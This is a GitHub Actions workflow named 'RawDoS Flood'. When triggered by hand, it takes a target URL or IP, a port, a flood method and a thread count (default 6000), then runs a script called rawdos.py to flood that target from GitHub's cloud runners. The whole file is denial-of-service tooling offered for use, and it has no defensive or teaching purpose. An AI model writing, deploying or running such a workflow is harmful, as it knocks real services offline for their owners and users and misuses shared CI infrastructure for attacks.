name: RawDoS Flood

on:
  workflow_dispatch:
    inputs:
      iptgt:
        description: "URL/IP Target"
        required: true
        default: "http://"
      portgt:
        description: "Port Target"
        required: true
        default: "80"
      method:
        description: "Method (1 => NORMAL|2 => GTPS)"
        required: true
        default: "2"
      thread:
        description: "Threads"
        required: true
        default: "6000"

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
    - name: Set up Python 3.9
      uses: actions/setup-python@v2
      with:
        python-version: 3.9
    - name: Install dependencies
      run: |
        python -m pip install --upgrade
        if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
    - name: Starting Flood...
      run: |
        python rawdos.py ${{ github.event.inputs.iptgt }}:${{ github.event.inputs.portgt }} ${{ github.event.inputs.method }} ${{ github.event.inputs.thread }}
